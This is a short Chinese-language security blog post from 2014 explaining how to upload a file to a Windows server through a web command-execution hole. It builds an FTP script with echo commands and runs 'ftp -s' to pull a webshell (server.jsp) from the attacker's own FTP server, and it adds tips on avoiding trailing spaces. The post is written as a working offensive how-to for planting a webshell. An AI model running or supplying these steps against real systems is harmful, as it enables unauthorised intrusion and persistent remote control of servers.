MENU

cmd下传文件方法记录

December 26, 2014 • Security

某个web的命令执行,windows主机,不像linux下可以通过wget下个文件很方便,开始尝试echo个vbs下载,如果直接在cmd下是没问题的,但是web端执行发现只要有逗号就连同后面的内容一起没了,后来又尝试一个转码脚本,反正试了半天最后还是没成功,网上找了找,发现了ftp这个方法,记录一下,本地先搭建一个ftp,假设用户名密码为admin/adminpwd 然后在web上分别执行如下命令:

echo admin>ftp.txt  注意admin后面不要加空格

echo adminpwd>>ftp.txt  同上,adminpwd后面不要加空格

echo get server.jsp>>ftp.txt  这里注意server.jsp为放到你本地ftp文件夹下的webshell文件

echo bye>>ftp.txt

这时web上执行ftp -s:ftp.txt 8.8.8.8 (这里8.8.8.8自行替换你搭建的ftp服务器地址)

执行echo的时候有一个小细节需要注意,好多人喜欢echo admin > ftp.txt这么写(admin后有空格),这样文件写出来admin后面也会有空格,传到ftp端的时候,用户名和密码就变成了admin空格和adminpwd空格,会提示你密码不正确

执行完就会发现可爱的server.jsp已经躺在当前目录下了,剩下的怎么操作随你了

Archives QR Code
QR Code for this page
Tipping QR Code